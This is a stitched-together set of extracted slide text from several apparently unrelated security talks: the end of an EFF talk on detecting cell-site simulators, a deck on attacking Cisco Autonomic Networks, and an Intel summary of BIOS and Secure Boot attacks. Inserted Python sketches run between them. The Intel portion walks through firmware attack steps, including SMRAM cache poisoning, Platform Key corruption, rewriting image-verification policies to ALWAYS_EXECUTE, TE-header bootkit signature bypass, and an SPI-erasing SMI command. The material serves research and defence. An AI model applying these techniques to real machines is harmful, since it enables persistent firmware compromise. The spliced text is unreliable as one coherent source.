2020 How Can we Stop Cell-Site Simulators • End 2G support on iOS and Android now! – https://www.eff.org/deeplinks/2020/06/your-phone-vulnerable-be cause-2g-it-doesnt-have-be • Eliminate pre-authentication messages – TLS for the handshake with towers • More incentives for standards orgs (3GPP), carriers, manufacturers, and OEMs to care about user privacy • Nothing is foolproof but we aren’t even doing the bare minimum yet. 
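Part of the Crocodile Hunter workflow described in this deck is mapping each cell by trilateration: intersecting range estimates taken from GPS-tagged readings. A minimal sketch of that idea as a least-squares fit is below; it is illustrative rather than the project's actual code, and it assumes scipy plus a flat-earth approximation that is only reasonable over short distances.

# Estimate a tower position from (lat, lon, estimated_range_m) readings by
# least squares: find the point whose distances to the readings best match
# the range estimates. Equirectangular (flat-earth) approximation.
import math
import numpy as np
from scipy.optimize import least_squares

EARTH_R = 6371000.0  # metres

def to_xy(lat, lon, lat0, lon0):
    # metres east/north of a reference point; fine over a few kilometres
    x = math.radians(lon - lon0) * EARTH_R * math.cos(math.radians(lat0))
    y = math.radians(lat - lat0) * EARTH_R
    return x, y

def locate(readings):
    lat0, lon0 = readings[0][0], readings[0][1]
    pts = np.array([to_xy(lat, lon, lat0, lon0) for lat, lon, _ in readings])
    ranges = np.array([r for _, _, r in readings])

    def residuals(p):
        # difference between modelled distance to candidate point and estimate
        return np.hypot(pts[:, 0] - p[0], pts[:, 1] - p[1]) - ranges

    fit = least_squares(residuals, x0=pts.mean(axis=0))
    x, y = fit.x
    lat = lat0 + math.degrees(y / EARTH_R)
    lon = lon0 + math.degrees(x / (EARTH_R * math.cos(math.radians(lat0))))
    return lat, lon

# readings: (lat, lon, estimated distance to the cell in metres)
print(locate([(38.900, -77.040, 900.0), (38.910, -77.030, 650.0), (38.895, -77.020, 1200.0)]))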
<location, date> <Location, date> Defcon Safe Mode // Aug 2020 Key Takeaways • We have a pretty good understanding the vulns in 4G which commercial cell-site simulators might exploit • None of the previous IMSI catcher detector apps really do the job any more. • We have come up with a method similar to established methods but targeting 4G. • The worst problems of CSS abuse can be solved! <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Thanks to the following people • Yomna! • The whole EFF crew • Andy and Bob at Wigle • Roger Piqueras-Jover • Nima Fatemi with Kandoo, Surya Mattu, Simon • Carlos and the FADE Project • Karl Kosher, Peter Ney, and others at UW (SEAGLASS) • Ash wilson (SITCH) and Eric Escobar (Defcon Justice Beaver) • Kristin Paget <location, date> <Location, date> Defcon Safe Mode // Aug 2020 Cooper Quintin Senior Security Researcher EFF Threat Lab cooperq@eff.org - twitter: @cooperq https://github.com/efforg/crocodilehunter Thank you! <location, date> <Location, date> Defcon Safe Mode // Aug 2020 References 1. https://www.eff.org/wp/gotta-catch-em-all-understanding-ho w-imsi-catchers-exploit-cell-networks 2. https://github.com/srsLTE/srsLTE 3. https://arxiv.org/pdf/1710.08932.pdf 4. https://www.usenix.org/system/files/conference/woot17/woo t17-paper-park.pdf 5. https://seaglass-web.s3.amazonaws.com/SeaGlass___PETS_20 17.pdf 6. https://www.sba-research.org/wp-content/uploads/publicatio ns/DabrowskiEtAl-IMSI-Catcher-Catcher-ACSAC2014.pdf
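The anomaly checks listed in this deck (new cells, cells that move, cells that are not where a ground-truth database says they should be, sudden power changes) all boil down to comparing each fresh reading against a baseline. A rough sketch of that comparison follows; the field names and thresholds are illustrative and are not the Crocodile Hunter schema.

# Flag readings that look unlike the known-tower baseline (e.g. a Wigle or
# OpenCelliD export). An anomaly is only a lead to verify, not proof of a CSS.
from math import radians, sin, cos, asin, sqrt

def km_between(a, b):
    # haversine distance between two (lat, lon) pairs
    lat1, lon1, lat2, lon2 = map(radians, (a[0], a[1], b[0], b[1]))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371 * asin(sqrt(h))

def check_reading(reading, known):
    """reading: dict with plmn, tac, cell_id, lat, lon, power_dbm keys."""
    key = (reading["plmn"], reading["tac"], reading["cell_id"])
    flags = []
    if key not in known:
        flags.append("new cell never seen before")
        return flags
    base = known[key]
    if km_between((reading["lat"], reading["lon"]), (base["lat"], base["lon"])) > 5:
        flags.append("cell is far from where the baseline places it")
    if abs(reading["power_dbm"] - base["power_dbm"]) > 20:
        flags.append("large change in received power")
    return flags

Each flagged cell still has to be located and confirmed by hand, which is why the workflow treats anomalies as candidates rather than detections.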
pdf
Attacking Autonomic Networks

Agenda
Autonomic Systems
Autonomic Network (credits)
Live Demo
Demo Results
Cisco Deployment
Channel Discovery
Adjacency Discovery

Adjacency Discovery (diagram): the enrollee announces "I am part of domain <domain name>"; the registrar announces "I support network/domain X". The enrollee generates a 3072-bit RSA key and sends the public key; the registrar returns the enrollee's domain certificate.

Secure Channel

Registrar Configuration
autonomic registrar
 domain-id ERNW.de
 whitelist flash:whitelist.txt
 CA local
 no shut
autonomic

Enrollee Configuration
autonomic

Autonomic Effect
Are you in Control?

Autonomic Network: Under The Hood
Channel Discovery (step-by-step walk-through)
Adjacency Discovery (step-by-step walk-through)
Secure Channel
Is it Secure?

Live Chat Support
Me: Hi, I connected 2 nodes from 2 different domains and they built the secure channel!
Support: Thanks for reporting, we created BugID CSCvd15717. We will check with the BU for that.
Support: Hi, the BU responded that as both have a certificate signed by the same CA, they can connect.
Me: Wait, what about different domains? Well, this shouldn't be.
Support: We will add a feature to check domains in the future!
Bug: CSCvd15717

Live Chat Support
Me: Hi, I can't revoke the certificate of one of the accepted nodes.
Support: We will check that. Please note that revoking certificates is not supported on a local CA.
Support: We created CVE-2017-6664 for that.
CVE-2017-6664

Live Chat Support
Me: Hi, the attacker can remotely reset the secure channel every time it is created; not only that, the information is also in plain text!
Support: We created CVE-2017-6665 for that.
CVE-2017-6665

Live Chat Support
Me: Hi, if the attacker resets the channel multiple times, eventually the node crashes!
Support: We created CVE-2017-6663 for that.
CVE-2017-6663

Live Chat Support
Me: Hi, the attacker can crash the registrar by sending invalid enrollee IDs.
Support: We created CVE-2017-3849 for that.
CVE-2017-3849

DeathKiss!
CVE-2017-3850

Conclusion
Finally…
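The core of bug CSCvd15717 above is that the secure channel only verifies that the peer's certificate chains to the shared CA and never compares the domain carried in that certificate with the local domain. Below is a minimal sketch of the missing check in Python, assuming for illustration that the domain name is carried in the certificate subject's OU attribute; the real Cisco implementation may encode it differently, so treat the field choice and function names as placeholders.

from cryptography import x509
from cryptography.x509.oid import NameOID

def peer_domain(cert_pem: bytes) -> str:
    # Extract the autonomic domain from the peer certificate.
    # Assumption for illustration: the domain lives in the subject OU field.
    cert = x509.load_pem_x509_certificate(cert_pem)
    ous = cert.subject.get_attributes_for_oid(NameOID.ORGANIZATIONAL_UNIT_NAME)
    if not ous:
        raise ValueError("certificate carries no domain attribute")
    return ous[0].value

def accept_channel(local_domain: str, peer_cert_pem: bytes) -> bool:
    # Chain validation against the domain CA is assumed to have happened already.
    # The missing check: refuse peers whose certificate names a different domain.
    return peer_domain(peer_cert_pem).lower() == local_domain.lower()

With such a check in place, two nodes enrolled under different domains would fail the comparison even though both certificates verify against the same local CA.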
pdf
Summary of Attacks Against BIOS and Secure Boot Yuriy Bulygin, John Loucaides, Andrew Furtak, Oleksandr Bazhaniuk, Alexander Matrosov Intel Security In The Beginning Was The Legacy BIOS.. Legacy BIOS 1. CPU Reset vector in BIOS ’ROM’ (Boot Block) 2. Basic CPU, chipset initialization 3. Initialize Cache-as-RAM, load and run from cache 4. Initialize DIMMs, create address map.. 5. Enumerate PCIe devices.. 6. Execute Option ROMs on expansion cards 7. Load and execute MBR 8. 2nd Stage Boot Loader OS Loader OS kernel Also Technical Note: UEFI BIOS vs. Legacy BIOS, Advantech Then World Moved to UEFI.. UEFI Boot From Secure Boot, Network Boot, Verified Boot, oh my and almost every publication on UEFI UEFI [Compliant] Firmware SEC Pre-EFI Init (PEI) Driver Exec Env (DXE) Boot Dev Select (BDS) Runtime / OS S-CRTM; Init caches/MTRRs; Cache-as-RAM (NEM); Recovery; TPM Init S-CRTM: Measure DXE/BDS Early CPU/PCH Init Memory (DIMMs, DRAM) Init, SMM Init Continue initialization of platform & devices Enum FV, dispatch drivers (network, I/O, service..) Produce Boot and Runtime Services Boot Manager (Select Boot Device) EFI Shell/Apps; OS Boot Loader(s) ExitBootServices. Minimal UEFI services (Variable) ACPI, UEFI SystemTable, SMBIOS table CPU Reset Signed BIOS Update & OS Secure Boot Signed BIOS Update UEFI Secure Boot Windows 8 Secure Boot Attacks Against Both Of These.. BIOS Attack Surface: SPI Flash Protection System FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. SPI Flash Write Protection • Often still not properly enabled on many systems • SMM based write protection of entire BIOS region is often not used: BIOS_CONTROL[SMM_BWP] • If SPI Protected Ranges (mode agnostic) are used (defined by PR0- PR4 in SPI MMIO), they often don’t cover entire BIOS & NVRAM • Some platforms use SPI device specific WP protection but only for boot block/startup code or SPI Flash descriptor region • Persistent BIOS Infection (used coreboot’s flashrom on legacy BIOS) • Evil Maid Just Got Angrier: Why FDE with TPM is Not Secure on Many Systems • BIOS Chronomancy: Fixing the Static Root of Trust for Measurement • A Tale Of One Software Bypass Of Windows 8 Secure Boot • Mitigation: BIOS_CONTROL[SMM_BWP] = 1 and SPI PRx •chipsec_main --module common.bios_wp • Or Copernicus from MITRE SPI Flash (BIOS) Write Protection is Still a Problem SPI Flash & BIOS Is Not Write Protected Checking Manually.. Windows: RWEverything Linux: setpci -s 00:1F.0 DC.B Better Way to Check If Your BIOS Is Write-Protected [*] running module: chipsec.modules.common.bios_wp [x][ ======================================================================= [x][ Module: BIOS Region Write Protection [x][ ======================================================================= [*] BIOS Control = 0x02 [05] SMM_BWP = 0 (SMM BIOS Write Protection) [04] TSS = 0 (Top Swap Status) [01] BLE = 1 (BIOS Lock Enable) [00] BIOSWE = 0 (BIOS Write Enable) [!] Enhanced SMM BIOS region write protection has not been enabled (SMM_BWP is not used) [*] BIOS Region: Base = 0x00500000, Limit = 0x007FFFFF SPI Protected Ranges ------------------------------------------------------------ PRx (offset) | Value | Base | Limit | WP? | RP? 
------------------------------------------------------------ PR0 (74) | 87FF0780 | 00780000 | 007FF000 | 1 | 0 PR1 (78) | 00000000 | 00000000 | 00000000 | 0 | 0 PR2 (7C) | 00000000 | 00000000 | 00000000 | 0 | 0 PR3 (80) | 00000000 | 00000000 | 00000000 | 0 | 0 PR4 (84) | 00000000 | 00000000 | 00000000 | 0 | 0 [!] SPI protected ranges write-protect parts of BIOS region (other parts of BIOS can be modified) [!] BIOS should enable all available SMM based write protection mechanisms or configure SPI protected ranges to protect the entire BIOS region [-] FAILED: BIOS is NOT protected completely # chipsec_main.py --module common.bios_wp Demo (Insecure SPI Flash Protection) From Analytics, and Scalability, and UEFI Exploitation by Teddy Reed Patch enables BIOS write protection (sets BIOS_CONTROL[BLE]). Picked up by Subzero. The fix is incomplete though SPI Flash Write Protection • Some systems write-protect BIOS by disabling BIOS Write-Enable (BIOSWE) and setting BIOS Lock Enable (BLE) but don’t use SMM based write-protection BIOS_CONTROL[SMM_BWP] • SMI event is generated when Update SW writes BIOSWE=1 • Possible attack against this configuration is to block SMI events • E.g. disable all chipset sources of SMI: clear SMI_EN[GBL_SMI_EN] if BIOS didn’t lock SMI config: Setup for Failure: Defeating SecureBoot • Another variant is to disable specific TCO SMI source used for BIOSWE/BLE (clear SMI_EN[TCO_EN] if BIOS didn’t lock TCO config.) • Mitigation: BIOS_CONTROL[SMM_BWP] = 1 and lock SMI config •chipsec_main --module common.bios_smi SMI Suppression Attack Variants SPI Flash Write Protection • Some BIOS rely on SPI Protected Range (PR0-PR4 registers in SPI MMIO) to provide write protection of regions of SPI Flash • SPI Flash Controller configuration including PRx has to be locked down by BIOS via Flash Lockdown • If BIOS doesn’t lock SPI Controller configuration (by setting FLOCKDN bit in HSFSTS SPI MMIO register), malware can disable SPI protected ranges re-enabling write access to SPI Flash •chipsec_main --module common.spi_lock Locking SPI Flash Configuration Is SPI Flash Configuration Locked? [+] imported chipsec.modules.common.spi_lock [x][ ======================================================================= [x][ Module: SPI Flash Controller Configuration Lock [x][ ======================================================================= [*] HSFSTS register = 0x0004E008 FLOCKDN = 1 [+] PASSED: SPI Flash Controller configuration is locked BIOS Attack Surface: BIOS Update System FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. Legacy BIOS Update and Secure Boot • Mebromi malware includes BIOS infector & MBR bootkit components • Patches BIOS ROM binary injecting malicious ISA Option ROM with legitimate BIOS image mod utility • Triggers SW SMI 0x29/0x2F to erase SPI flash then write patched BIOS binary • chipsec_util smi 0x29 0x0 Signed BIOS Updates Are Rare • No concept of Secure or Verified Boot • Wonder why TDL4 and likes flourished? No Signature Checks of OS boot loaders (MBR) UEFI BIOS Update Problems • Unsigned sections within BIOS update (e.g. 
boot splash logo BMP image) • BIOS displayed the logo before SPI Flash write- protection was enabled • EDK ConvertBmpToGopBlt() integer overflow followed by memory corruption during DXE while parsing BMP image • Copy loop overwrote #PF handler and triggered #PF • Attacking Intel BIOS Parsing of Unsigned BMP Image in UEFI FW Update Binary UEFI BIOS Update Problems • Legacy BIOS with signed BIOS update • OS schedules BIOS update placing new BIOS image in DRAM split into RBU packets • Upon reboot, BIOS Update SMI Handler reconstructs BIOS image from RBU packets in SMRAM and verifies signature • Buffer overflow (memcpy with controlled size/dest/src) when copying RBU packet to a buffer with reconstructed BIOS image • BIOS Chronomancy: Fixing the Core Root of Trust for Measurement • Defeating Signed BIOS Enforcement RBU Packet Parsing Vulnerability BIOS Attack Surface: HW Configuration/Protections System FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. Problems With HW Configuration/Protections • D_LCK bit locks down Compatible SMM space (a.k.a. CSEG) configuration (SMRAMC) • SMRAMC[D_OPEN]=0 forces access to legacy SMM space decode to system bus rather than to DRAM where SMI handlers are when CPU is not in System Management Mode (SMM) • When D_LCK is not set by BIOS, SMM space decode can be changed to open access to CSEG when CPU is not in SMM: Using CPU SMM to Circumvent OS Security Functions • Also Using SMM For Other Purposes • chipsec_main –-module common.smm Unlocked Compatible/Legacy SMRAM Compatible SMM Space: Normal Decode 0xBFFFF Compatible SMRAM (CSEG) SMM access to CSEG is decoded to DRAM, non-SMM access is sent to system bus 0xA0000 Non SMM access SMRAMC [D_LCK] = 1 SMRAMC [D_OPEN] = 0 Compatible SMM Space: Unlocked 0xBFFFF Compatible SMRAM (CSEG) Non-SMM access to CSEG is decoded to DRAM where SMI handlers can be modified 0xA0000 Non SMM access SMRAMC [D_LCK] = 0 SMRAMC [D_OPEN] = 1 Is Compatible SMRAM Locked? [+] imported chipsec.modules.common.smm [x][ ================================================================= [x][ Module: SMM memory (SMRAM) Lock [x][ ================================================================= [*] SMRAM register = 0x1A ( D_LCK = 1, D_OPEN = 0 ) [+] PASSED: SMRAM is locked Problems With HW Configuration/Protections • CPU executes from cache if memory type is cacheable • Ring0 exploit can make SMRAM cacheable (variable MTRR) • Ring0 exploit can then populate cache-lines at SMBASE with SMI exploit code (ex. modify SMBASE) and trigger SMI • CPU upon entering SMM will execute SMI exploit from cache • Attacking SMM Memory via Intel Cache Poisoning • Getting Into the SMRAM: SMM Reloaded • CPU System Management Range Registers (SMRR) forcing UC and blocking access to SMRAM when CPU is not in SMM • BIOS has to enable SMRR • chipsec_main –-module common.smrr SMRAM “Cache Poisoning” Attacks Is SMRAM Exposed To Cache Poisoning Attack? [*] running module: chipsec.modules.common.smrr [x][ ======================================================================= [x][ Module: CPU SMM Cache Poisoning / SMM Range Registers (SMRR) [x][ ======================================================================= [+] OK. SMRR are supported in IA32_MTRRCAP_MSR [*] Checking SMRR Base programming.. [*] IA32_SMRR_BASE_MSR = 0x00000000BD000006 BASE = 0xBD000000 MEMTYPE = 6 [+] SMRR Memtype is WB [+] OK so far. SMRR Base is programmed [*] Checking SMRR Mask programming.. 
[*] IA32_SMRR_MASK_MSR = 0x00000000FF800800 MASK = 0xFF800000 VLD = 1 [+] OK so far. SMRR are enabled in SMRR_MASK MSR [*] Verifying that SMRR_BASE/MASK have the same values on all logical CPUs.. [CPU0] SMRR_BASE = 00000000BD000006, SMRR_MASK = 00000000FF800800 [CPU1] SMRR_BASE = 00000000BD000006, SMRR_MASK = 00000000FF800800 [CPU2] SMRR_BASE = 00000000BD000006, SMRR_MASK = 00000000FF800800 [CPU3] SMRR_BASE = 00000000BD000006, SMRR_MASK = 00000000FF800800 [+] OK so far. SMRR MSRs match on all CPUs [+] PASSED: SMRR protection against cache attack seems properly configured Problems With HW Configuration/Protections • Remap Window is used to reclaim DRAM range below 4Gb “lost” for Low MMIO • Defined by REMAPBASE/REMAPLIMIT registers in Memory Controller PCIe config. space • MC remaps Reclaim Window access to DRAM below 4GB (above “Top Of Low DRAM”) • If not locked, OS malware can reprogram target of reclaim to overlap with SMRAM • Preventing & Detecting Xen Hypervisor Subversions • BIOS has to lock down Memory Map registers including REMAP*, TOLUD/TOUUD SMRAM Memory Remapping/Reclaim Attack Memory Remapping: Normal Memory Map Memory Reclaim/Remap Range Low MMIO Range TOLUD 4GB SMRAM REMAPBASE REMAPLIMIT Access is remapped to DRAM range ‘lost’ to MMIO (memory reclaimed) Access Memory Remapping: SMRAM Remapping Attack Memory Reclaim/Remap Range Low MMIO Range TOLUD 4GB SMRAM REMAPBASE REMAPLIMIT Target range of memory reclaim changed to SMRAM Access Problems With HW Configuration/Protections • “Top Swap” feature allows fault-tolerant update of BIOS boot block • Enabled by BUC[TS] in Root Complex MMIO range • When enabled, chipset flips A16-A20 address bits (depending on the size of boot block) when CPU fetches reset vector on reboot • Thus CPU executes from 0xFFFEFFF0 inside “backup” boot block rather than from 0xFFFFFFF0 • What if malware enables Top Swap? • BIOS Boot Hijacking and VMware Vulnerabilities Digging • BIOS has to lock down Top Swap configuration (BIOS Interface Lock in General Control & Status register) & protect top swap range in SPI • chipsec_main --module common.bios_ts BIOS Top Swap Attack Is BIOS Interface Locked? [+] imported chipsec.modules.common.bios_ts [x][ ======================================================================= [x][ Module: BIOS Interface Lock and Top Swap Mode [x][ ======================================================================= [*] RCBA General Config base: 0xFED1F400 [*] GCS (General Control and Status) register = 0x00000021 [10] BBS (BIOS Boot Straps) = 0x0 [00] BILD (BIOS Interface Lock-Down) = 1 [*] BUC (Backed Up Control) register = 0x00000000 [00] TS (Top Swap) = 0 [*] BC (BIOS Control) register = 0x2A [04] TSS (Top Swap Status) = 0 [*] BIOS Top Swap mode is disabled [+] PASSED: BIOS Interface is locked (including Top Swap Mode) BIOS Attack Surface: SMI Handlers System FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. 
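Several of the checks above come down to reading one configuration register and testing individual lock bits: BIOSWE/BLE/SMM_BWP in BIOS_CONTROL, BILD in GCS, and TS in BUC. The following is a minimal sketch of that decoding logic in Python, given raw register values obtained for example with setpci or chipsec_util; the bit positions are the ones shown in the register dumps above and may vary across chipset generations, so treat them as illustrative.

def bit(value: int, pos: int) -> int:
    return (value >> pos) & 1

def check_bios_write_protection(bios_control: int) -> list:
    # BIOS_CONTROL (BC) bits per the dump above: BIOSWE=0, BLE=1, SMM_BWP=5
    findings = []
    if bit(bios_control, 0):
        findings.append("BIOSWE set: BIOS region is writable from the OS")
    if not bit(bios_control, 1):
        findings.append("BLE clear: no SMI is raised when BIOSWE is flipped")
    if not bit(bios_control, 5):
        findings.append("SMM_BWP clear: SMM-based write protection not enabled")
    return findings or ["BIOS write-protection bits look properly configured"]

def check_bios_interface_lock(gcs: int, buc: int) -> list:
    # BILD (GCS bit 0) must be set so Top Swap / boot straps cannot be flipped;
    # TS (BUC bit 0) should be 0 unless a fault-tolerant update is in progress
    findings = []
    if not bit(gcs, 0):
        findings.append("BILD clear: BIOS interface (incl. Top Swap) is not locked")
    if bit(buc, 0):
        findings.append("TS set: reset vector will be fetched from the backup boot block")
    return findings or ["BIOS interface lock looks properly configured"]

# Example using the values from the dumps above: BC=0x02, GCS=0x00000021, BUC=0x0
print(check_bios_write_protection(0x02))
print(check_bios_interface_lock(0x21, 0x0))

Run against the dumped values, the first check reproduces the "SMM_BWP not enabled" warning and the second reproduces the PASSED verdict shown earlier.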
Legacy SMI Handlers Calling Out of SMRAM Phys Memory SMRAM CALL F000:8070 Legacy BIOS Shadow (F/ E-segments) PA = 0xF0000 1 MB Legacy SMI Handlers Calling Out of SMRAM Phys Memory SMRAM CALL F000:8070 Legacy BIOS Shadow (F/ E-segments) PA = 0xF0000 1 MB Code fetch in SMM Legacy SMI Handlers Calling Out of SMRAM Phys Memory SMRAM CALL F000:8070 Legacy BIOS Shadow (F/ E-segments) PA = 0xF0000 1 MB 0xF8070: payload 0F000:08070 = 0xF8070 PA Code fetch in SMM Legacy SMI Handlers Calling Out of SMRAM • OS level exploit stores payload in F-segment below 1MB (0xF8070 Physical Address) • Exploit has to also reprogram PAM for F-segment • Then triggers “SW SMI” via APMC port (I/O 0xB2) • SMI handler does CALL 0F000:08070 in SMM • BIOS SMM Privilege Escalation Vulnerabilities (14 issues in just one SMI Handler) • System Management Mode Design and Security Issues Branch Outside of SMRAM Function Pointers Outside of SMRAM (DXE SMI) Phys Memory SMRAM mov ACPINV+x, %rax call *0x18(%rax) ACPI NV Area payload 1. Read function pointer from ACPI NVS memory (outside SMRAM) Pointer to payload 2. Call function pointer (payload outside SMRAM) Attacking Intel BIOS BIOS Attack Surface: UEFI Secure Boot System FW/BIOS SMI Handlers SPI Flash HW Config/ Protection Secure Boot BIOS Update BIOS Settings (NVRAM, Variables) Option ROMs Firmware Volumes / PE exec. Secure Boot Key Hierarchy Platform Key (PK) Verifies KEKs Platform Vendor’s Cert Key Exchange Keys (KEKs) Verify db and dbx Earlier rev’s: verifies image signatures Authorized Database (db) Forbidden Database (dbx) X509 certificates, SHA1/SHA256 hashes of allowed & revoked images Earlier revisions: RSA-2048 public keys, PKCS#7 signatures Platform Key (Root Key) has to be Valid PK variable exists in NVRAM? Yes. Set SetupMode variable to USER_MODE No. Set SetupMode variable to SETUP_MODE SecureBootEnable variable exists in NVRAM? Yes SecureBootEnable variable is SECURE_BOOT_ENABLE and SetupMode variable is USER_MODE? Set SecureBoot variable to ENABLE Else? Set SecureBoot variable to DISABLE No SetupMode is USER_MODE? Set SecureBoot variable to ENABLE SetupMode is SETUP_MODE? Set SecureBoot variable to DISABLE First Public Windows 8 Secure Boot Bypass A Tale Of One Software Bypass Of Windows 8 Secure Boot Platform Key in NVRAM Can Be Modified Corrupt Platform Key EFI variable in NVRAM Name (“PK”) or Vendor GUID {8BE4DF61-93CA-11D2- AA0D-00E098032B8C} Recall that AutenticatedVariableService DXE driver enters Secure Boot SETUP_MODE when correct “PK” EFI variable cannot be located in EFI NVRAM Main volatile SecureBoot variable is then set to DISABLE DXE ImageVerificationLib then assumes Secure Boot is off and skips Secure Boot checks Generic exploit, independent of the platform/vendor 1 bit modification! PK Mod: Before and After Exploit Programs SPI Controller & Modifies SPI Flash Signed BIOS Update Modify Secure Boot FW or config in ROM Then Installs UEFI Bootkit on ESP Signed BIOS Update Install UEFI Bootkit Modified FW Doesn’t Enforce Secure Boot Signed BIOS Update Demo (Bypassing Secure Boot by Corrupting Platform Key in SPI) Turn On/Off Secure Boot in BIOS Setup How to Disable Secure Boot? SecureBootEnable UEFI Variable When turning ON/OFF Secure Boot, it should change Hmm.. but there is no SecureBootEnable variable Where does the BIOS store Secure Boot Enable flag? Should be NV somewhere in SPI Flash.. Just dump SPI flash with Secure Boot ON and OFF Then compare two SPI flash images Yeah.. Good Luck With That ;( There’s A Better Way.. 
Secure Boot On Secure Boot Off Secure Boot On Secure Boot Off Secure Boot Disable is Really in Setup! chipsec_util.py spi dump spi.bin chipsec_util.py uefi nvram spi.bin chipsec_util.py decode spi.bin Demo (Attack Disabling Secure Boot) Secure Boot: Image Verification Policies DxeImageVerificationLib defines policies applied to different types of images and on security violation IMAGE_FROM_FV (ALWAYS_EXECUTE), IMAGE_FROM_FIXED_MEDIA, IMAGE_FROM_REMOVABLE_MEDIA, IMAGE_FROM_OPTION_ROM ALWAYS_EXECUTE, NEVER_EXECUTE, ALLOW_EXECUTE_ON_SECURITY_VIOLATION DEFER_EXECUTE_ON_SECURITY_VIOLATION DENY_EXECUTE_ON_SECURITY_VIOLATION QUERY_USER_ON_SECURITY_VIOLATION SecurityPkg\Library\DxeImageVerificationLib http://sourceforge.net/apps/mediawiki/tianocore/index.php?title=SecurityPkg Secure Boot: Image Verification Policies Image Verification Policy? (IMAGE_FROM_FV) ALWAYS_EXECUTE? EFI_SUCCESS NEVER_EXECUTE? EFI_ACCESS_DENIED Storing Image Verification Policies in Setup Read ‘Setup’ UEFI variable and look for sequences 04 04 04, 00 04 04, 05 05 05, 00 05 05 We looked near Secure Boot On/Off Byte! Modify bytes corresponding to policies to 00 (ALWAYS_EXECUTE) then write modified ‘Setup’ variable Modifying Image Verification Policies [CHIPSEC] Reading EFI variable Name='Setup' GUID={EC87D643-EBA4-4BB5-A1E5- 3F3E36B20DA9} from 'Setup_orig.bin' via Variable API.. EFI variable: Name : Setup GUID : EC87D643-EBA4-4BB5-A1E5-3F3E36B20DA9 Data : .. 01 01 01 00 00 00 00 01 01 01 00 00 00 00 00 00 | 00 00 00 00 00 00 01 01 00 00 00 04 04 | [CHIPSEC] (uefi) time elapsed 0.000 [CHIPSEC] Writing EFI variable Name='Setup' GUID={EC87D643-EBA4-4BB5-A1E5- 3F3E36B20DA9} from 'Setup_policy_exploit.bin' via Variable API.. Writing EFI variable: Name : Setup GUID : EC87D643-EBA4-4BB5-A1E5-3F3E36B20DA9 Data : .. 01 01 01 00 00 00 00 01 01 01 00 00 00 00 00 00 | 00 00 00 00 00 00 01 01 00 00 04 00 00 | [CHIPSEC] (uefi) time elapsed 0.203 OptionRomPolicy FixedMediaPolicy RemovableMediaPolicy Allows Bypassing Secure Boot Issue was co-discovered with Corey Kallenberg, Xeno Kovah, John Butterworth and Sam Cornwell from MITRE All Your Boot Are Belong To Us, Setup for Failure: Defeating SecureBoot Demo (Bypassing Secure Boot via Image Verification Policies) How To Avoid These? 1. Do not store critical Secure Boot configuration in UEFI variables accessible to potentially compromised OS kernel or boot loader Remove RUNTIME_ACCESS attribute (reduce access permissions) Use authenticated variable where required by UEFI Spec Disabling Secure Boot requires physically present user 2. Set Image Verification Policies to secure values Use Platform Configuration Database (PCD) for the policies Using ALWAYS_EXECUTE,ALLOW_EXECUTE_* is a bad idea Especially check PcdOptionRomImageVerificationPolicy Default should be NEVER_EXECUTE or DENY_EXECUTE Recap on Image Verification Handler SecureBoot EFI variable doesn’t exist or equals to SECURE_BOOT_MODE_DISABLE? EFI_SUCCESS File is not valid PE/COFF image? EFI_ACCESS_DENIED SecureBootEnable NV EFI variable doesn’t exist or equals to SECURE_BOOT_DISABLE? EFI_SUCCESS SetupMode NV EFI variable doesn’t exist or equals to SETUP_MODE? EFI_SUCCESS EFI Executables Any EFI executables other then PE/COFF? YES! – EFI Byte Code (EBC), Terse Executable (TE) But EBC image is a 32 bits PE/COFF image wrapping byte code. 
No luck Terse Executable format: In an effort to reduce image size, a new executable image header (TE) was created that includes only those fields from the PE/COFF headers required for execution under the PI Architecture. Since this header contains the information required for execution of the image, it can replace the PE/COFF headers from the original image. http://wiki.phoenix.com/wiki/index.php/Terse_Executable_Format TE is not PE/COFF TE differs from PE/COFF only with header: PE/TE Header Handling by the BIOS Decoded UEFI BIOS image from SPI Flash PE/TE Header Handling by the BIOS CORE_DXE.efi: PE/TE Header Confusion ExecuteSecurityHandler calls GetFileBuffer to read an executable file. GetFileBuffer reads the file and checks it to have a valid PE header. It returns EFI_LOAD_ERROR if executable is not PE/COFF. ExecuteSecurityHandler returns EFI_SUCCESS (0) in case GetFileBuffer returns an error Signature Checks are Skipped! PE/TE Header Confusion BIOS allows running TE images w/o signature check Malicious PE/COFF EFI executable (bootkit.efi) Convert executable to TE format by replacing PE/COFF header with TE header Replace OS boot loaders with resulting TE EFI executable Signature check is skipped for TE EFI executable Executable will load and patch original OS boot loader Demo (Secure Boot Bypass via PE/TE Header Confusion) Other Secure Boot Problems • CSM Module Allows Legacy On UEFI Based Firmware • Allows Legacy OS Boot Through [Unsigned] MBR • Allows Loading Legacy [Unsigned] Option ROMs • Once CSM is ON, UEFI BIOS dispatches legacy OROMs then boots MBR • CSM Cannot Be Turned On When Secure Boot is Enabled • CSM can be turned On/Off in BIOS Setup Options • But cannot select “CSM Enabled” when Secure Boot is On CSM Enabled with Secure Boot • Force CSM to Disabled if Secure Boot is Enabled • But don’t do that only in Setup HII • Implement isCSMEnabled() function always returning FALSE in Secure Boot • Never fall back to legacy boot through MBR if Secure Boot verification of UEFI executable fails Mitigations Clearing Platform Key… from Software “Clear Secure Boot keys” takes effect after reboot Switch that triggers clearing of Secure Boot keys is in UEFI Variable (happens to be in ‘Setup’ variable) But recall that Secure Boot is OFF without Platform Key PK is cleared Secure Boot is Disabled Install Default Keys… From Where? Default Secure Boot keys can be restored [When there’s no PK] Switch that triggers restore of Secure Boot keys to their default values is in UEFI Variable (happens to be in ‘Setup’) Nah.. Default keys are protected. They are in FV But we just added 9 hashes to the DBX blacklist Did You Notice Secure Boot Config. Changed? The system protects Secure Boot configuration from modification but has an implementation bug Firmware stores integrity of Secure Boot settings & checks on reboot Upon integrity mismatch, beeps 3 times, waits timeout then… Keeps booting with modified Secure Boot settings BIOS Attack Surface: Handling Sensitive Data System 